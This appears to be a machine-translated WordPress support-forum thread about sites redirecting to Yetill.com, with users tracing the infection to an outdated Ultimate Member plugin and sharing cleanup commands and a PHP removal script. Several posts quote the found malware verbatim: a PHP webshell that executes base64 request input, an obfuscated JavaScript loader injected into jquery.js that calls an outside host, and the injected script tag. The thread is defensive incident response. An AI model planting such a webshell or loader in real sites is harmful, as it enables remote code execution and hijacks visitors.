Кто-нибудь может помочь мне, как исправить мой сайт? Он всегда перенаправляется на Yetill.com. Я искал об этом сайте, и я узнал, что это своего рода вредоносное ПО. Пробовал различные решения, найденные в сети, но так и не решил.
Спасибо.
Кто-нибудь может помочь мне, как исправить мой сайт? Он всегда перенаправляется на Yetill.com. Я искал об этом сайте, и я узнал, что это своего рода вредоносное ПО. Пробовал различные решения, найденные в сети, но так и не решил.
Спасибо.
Похоже, это вызвано уязвимостью некоторых плагинов, которые вы можете использовать.
В моем случае это была более старая версия (до 2.22) плагина Ultimate Member.
Если вы используете версию 2.22 или более раннюю версию этого плагина, вам следует немедленно обновить этот плагин и очистить временные файлы. (https://wordpress.org/support/topic/malicious-files-in-ultimate-members-plugin/)
После этого выполните поиск недавно обновленных файлов с помощью этой команды. (например, 15 дней)
find ./ -type f -mtime -15
Скорее всего, ваш файл WP jquery и любые файлы с именем «header» могут быть заражены.
/wp-includes/js/jquery/jquery.js
/wp-contents/your-theme/header.php
..
Удалите следующий скрипт из зараженных заголовочных файлов.
<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>
Похоже, что это вставляется сразу после открывающего тега заголовка и прямо перед закрывающим тегом заголовка. Убедитесь, что вы удалили оба.
Удалите злонамеренно вставленный скрипт из зараженного файла Jquery или просто замените файл чистым скриптом из других установок WP Core.
Думаю, это должно решить проблему.
Предварительные шаги:
/*! jQuery v1....
Удалить все перед этой строкой (вы сделали резервную копию, верно?)Задний план:
У нас такая же проблема. Wordfence заметил, что файл wp-includes/js/jquery/jquery.js был изменен на сервере. Восстановление его до исходной версии, похоже, решило эту проблему. НО, файл заразился быстро (часы?). Так что источник нам пока неизвестен...
Мы нашли подозрительный код в /wp-content/uploads/ultimatemember/temp/[random dir]/n.php:
<?php file_put_contents('sdgsdfgsdg','<?php '.base64_decode($_REQUEST['q']));
include('sdgsdfgsdg'); unlink('sdgsdfgsdg'); ?>
Это в основном выполняет любой код PHP извне...
После удаления этих файлов сайт вернулся в нормальное состояние (пару часов).
Мы также заметили подозрительный тег <a>
в исходном коде страницы; но не уверен в его актуальности.
<a class="html-attribute-value html-resource-link" target="_blank"
href="https://our.site/wordpress/wp-includes/js/jquery/jquery.js?ver=1.12.4"
rel="noreferrer noopener">https://our.site/wordpress/wp-includes/js/jquery/jquery.js?ver=1.12.4</a>
Вам придется выполнить некоторые действия по устранению неполадок. Либо ваша тема, либо один из ваших плагинов содержит вредоносный код.
Следуй этим шагам:
TwentySeventeen
. Если проблема не устранена, это означает, что это не ваша тема.Надеюсь это поможет.
jquery был заражен в моем случае. Просто удалите код перед /*! jQuery v1.12.4 | (c) Фонд jQuery | jquery.org/license */ и убедитесь, что все ваши плагины обновлены, а сайт безопасен. Также проверьте права доступа к файлам! Это помогает мне в моем случае
У нас такая же ошибка, эти файлы были заражены. Это вредоносный код, который я нашел в них.
wp-includes/js/jquery/jquery.js
(function() { "use strict"; var _0xa8bd=["\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x72\x63\x2E\x65\x65\x64\x75\x65\x6C\x65\x6D\x65\x6E\x74\x73\x2E\x63\x6F\x6D\x2F\x67\x65\x74\x2E\x70\x68\x70","\x6E\x75\x6C\x6C","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64"];function httpGet(_0xc4ecx2){var _0xc4ecx3= new XMLHttpRequest();_0xc4ecx3[_0xa8bd[1]](_0xa8bd[0],_0xc4ecx2,false);_0xc4ecx3[_0xa8bd[2]](null);return _0xc4ecx3[_0xa8bd[3]]}var curdomain=_0xa8bd[4];var newlink=httpGet(curdomain);if(newlink!= _0xa8bd[5]){(function(){var _0xc4ecx6=document[_0xa8bd[7]](_0xa8bd[6]);_0xc4ecx6[_0xa8bd[8]]= _0xa8bd[9];_0xc4ecx6[_0xa8bd[10]]= true;_0xc4ecx6[_0xa8bd[11]]= newlink;document[_0xa8bd[13]][_0xa8bd[12]](_0xc4ecx6)})()} })();
темы/вашатема/header.php
<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>
Это то, что я обнаружил сегодня после запуска сканера securi. Надеюсь, это поможет кому-то, потому что это противно. Похоже, что в моем случае затрагиваются следующие файлы:
Что бы это ни было, похоже, оно пошло не так в моем каталоге wp-includes. Я запускаю плагин Ultimate Member и заметил, что кто-то упоминал ранее, что в более ранних версиях этого плагина были уязвимости. Я управляю сетью с несколькими сайтами и также заметил, что две регистрационные формы на моих дочерних сайтах имеют роль администратора по умолчанию (какой поставщик плагинов сочтет это безопасным в качестве параметра регистрации по умолчанию?) с включенной опцией автоматического утверждения ( писем с подтверждением нет). По-видимому, активация этого плагина в сетевой среде требует дополнительной тщательной проверки этих форм регистрации и входа.
Была такая же проблема. jquery был заражен, и его пришлось заменить оригинальной версией. Хакер, вероятно, использовал бэкдор Ultimatemember, чтобы загрузить php-файл и запустить его. Мне пришлось очистить временный каталог плагина.
Другое наблюдение заключалось в том, что взлом заставлял модифицированный jquery загружать скрипт, адрес которого загружался с http://src.eeduelements.com/get.php . Это дает им возможность чередовать объявления.
sudo grep --include=\*.php -rnw . -e "<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>"
что наряду с этим ответом ниже помогло мне очистить мои файлы. Это затронуло все мои веб-сайты, но теперь, похоже, все еще сохраняется на сайте, на котором был конечный участник. Все еще работаю над этим. Однако этот Php-скрипт был просто невероятным. спасибо автору конечно.
Это php из приведенного выше ответа. Я просто заменил часть поиска вредоносными программами, перенаправляющими на Yetill.
<?php
//Enter it as it is and escape any single quotes
$find='<script type=\'text/javascript\' src=\'https://cdn.eeduelements.com/jquery.js?ver=1.0.8\'></script>';
echo findString('./',$find);
function findString($path,$find){
$return='';
ob_start();
if ($handle = opendir($path)) {
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != "..") {
if(is_dir($path.'/'.$file)){
$sub=findString($path.'/'.$file,$find);
if(isset($sub)){
echo $sub.PHP_EOL;
}
}else{
$ext=substr(strtolower($file),-3);
if($ext=='php'){
$filesource=file_get_contents($path.'/'.$file);
$pos = strpos($filesource, $find);
if ($pos === false) {
continue;
} else {
//The cleaning bit
echo "The string '".htmlentities($find)."' was found in the file '$path/$file and exists at position $pos and has been removed from the source file.<br />";
$clean_source = str_replace($find,'',$filesource);
file_put_contents($path.'/'.$file,$clean_source);
}
}else{
continue;
}
}
}
}
closedir($handle);
}
$return = ob_get_contents();
ob_end_clean();
return $return;
}
?>